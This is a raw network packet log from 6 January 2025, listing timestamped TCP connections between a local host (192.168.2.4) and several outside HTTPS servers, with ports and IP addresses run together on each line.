                                                                                                                                                                  Jan 6, 2025 23:18:01.080235958 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.080251932 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.086582899 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.086743116 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.086750984 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.093091011 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.093163967 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.093173981 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.099705935 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.099766016 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.378606081 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378667116 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.378675938 CET44349928142.250.185.65192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.378689051 CET49928443192.168.2.4142.250.185.65
                                                                                                                                                                  Jan 6, 2025 23:18:01.464267969 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:01.464279890 CET4434994018.244.18.27192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.574948072 CET49940443192.168.2.418.244.18.27
                                                                                                                                                                  Jan 6, 2025 23:18:01.616569996 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.616602898 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.616727114 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.616913080 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.616923094 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.617331028 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.617353916 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.617602110 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.617809057 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.617820978 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.715332031 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.715389013 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:01.715446949 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.715986013 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:01.716011047 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.089059114 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.089332104 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.089340925 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.090828896 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.090897083 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.093261957 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.093344927 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.094748020 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.094753027 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.096918106 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.097213030 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.097223997 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.098227024 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.098283052 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.099287987 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.099359989 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.099714994 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.099723101 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.150207996 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.170969009 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.171401978 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.171422005 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.172688007 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.172755957 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.182352066 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.182416916 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.182557106 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.182565928 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.205836058 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.205899000 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.206069946 CET49958443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.206083059 CET44349958172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.237584114 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.237633944 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.237684965 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.237797976 CET49959443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.237809896 CET44349959172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.285285950 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.297785044 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.297832012 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:02.297960997 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.298041105 CET49961443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:02.298057079 CET44349961172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.293808937 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.293853045 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.293904066 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.294593096 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.294621944 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.294781923 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.295644045 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.295658112 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.295917988 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.295931101 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.302444935 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.302465916 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.302617073 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.302859068 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.302877903 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.302948952 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.303956032 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.303972006 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.304263115 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.304270983 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.457665920 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.457690954 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.458175898 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.458198071 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.458209991 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.458249092 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.460870028 CET49976443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.460894108 CET44349976172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.461194038 CET49975443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.461206913 CET44349975172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.749943972 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.769777060 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.772602081 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.790642023 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.817549944 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.817715883 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.817715883 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.857249975 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.857273102 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.857736111 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.859858036 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.859864950 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.860433102 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.861335993 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.861341953 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.861644983 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.861670017 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862468958 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862530947 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.862703085 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862715006 CET44349973172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.862761021 CET49973443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.863267899 CET49971443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.863359928 CET44349971172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.864506006 CET49972443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.864592075 CET44349972172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:03.865458012 CET49974443192.168.2.4172.64.41.3
                                                                                                                                                                  Jan 6, 2025 23:18:03.865525961 CET44349974172.64.41.3192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.722183943 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.723125935 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.723134041 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.724716902 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.724776030 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.725590944 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.725686073 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.766429901 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.766437054 CET50029443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.766439915 CET44350030204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.813536882 CET50030443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.813555956 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:07.813571930 CET4435002823.43.85.38192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.813607931 CET50031443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.813635111 CET44350031204.79.197.219192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:07.925648928 CET50031443192.168.2.4204.79.197.219
                                                                                                                                                                  Jan 6, 2025 23:18:07.925647020 CET50028443192.168.2.423.43.85.38
                                                                                                                                                                  Jan 6, 2025 23:18:08.711177111 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.711220980 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:08.711379051 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.712069035 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.712089062 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:08.714153051 CET50045443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.714195013 CET4435004520.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:08.714338064 CET50045443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.714804888 CET50045443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.714818001 CET4435004520.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:08.951499939 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.951550007 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:08.951611996 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.952261925 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:08.952280045 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.301152945 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.301392078 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.301417112 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.301744938 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.302083969 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.302159071 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.302320957 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.302392960 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.302418947 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.312319994 CET4435004520.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.313935041 CET50045443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.313961983 CET4435004520.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.314359903 CET4435004520.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.316760063 CET50045443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.316824913 CET4435004520.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.317130089 CET50045443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.317241907 CET50045443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.317260027 CET4435004520.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.428384066 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.428464890 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.428514004 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.429049015 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.429064035 CET4435004420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.429075956 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.429105997 CET50044443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.537656069 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.537925005 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.537949085 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.538851023 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.538911104 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.539486885 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.539542913 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.539653063 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.539659023 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.539822102 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.539845943 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.701689005 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.701772928 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.701818943 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.702526093 CET50049443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.702543974 CET4435004920.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.713407040 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.713447094 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:09.713500977 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.713912964 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:09.713932991 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.304775953 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:10.304805994 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.308628082 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:10.310787916 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:10.310798883 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.312897921 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.313175917 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:10.313200951 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.313572884 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.315100908 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:10.315180063 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.315676928 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:10.315777063 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:10.315824032 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.481787920 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.481865883 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.484780073 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:10.484807014 CET4435005420.42.65.85192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.484833002 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:10.488775969 CET50054443192.168.2.420.42.65.85
                                                                                                                                                                  Jan 6, 2025 23:18:10.796299934 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.796365023 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:10.924417019 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:10.924444914 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:10.924659967 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.023938894 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:11.190623045 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:11.190653086 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:11.190663099 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.809210062 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.809267998 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.809298992 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.809326887 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.809350967 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:11.809361935 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.809382915 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.809427977 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:11.809427977 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:11.810012102 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.810379982 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.810411930 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.810442924 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.810466051 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:11.810473919 CET44350061104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:11.810504913 CET50061443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:23.533720970 CET4434998223.49.251.7192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.535844088 CET49982443192.168.2.423.49.251.7
                                                                                                                                                                  Jan 6, 2025 23:18:23.667198896 CET44350112104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.667256117 CET44350112104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:23.672574043 CET50112443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:23.672574043 CET50112443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:23.672822952 CET50112443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:23.672837973 CET44350112104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.020453930 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.020504951 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.020579100 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.021178007 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.021188974 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.479846001 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.479913950 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.481421947 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.481431961 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.481642008 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.482383013 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.482409954 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.482414007 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810313940 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810363054 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810412884 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.810498953 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.810511112 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.810523033 CET50113443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.810528040 CET44350113104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.986290932 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.986323118 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:24.986512899 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.986756086 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:24.986771107 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.469476938 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.469661951 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.470768929 CET50114443192.168.2.4104.21.80.52
                                                                                                                                                                  Jan 6, 2025 23:18:25.470779896 CET44350114104.21.80.52192.168.2.4
                                                                                                                                                                  Jan 6, 2025 23:18:25.470983982 CET44350114104.21.80.52192.168.2.4
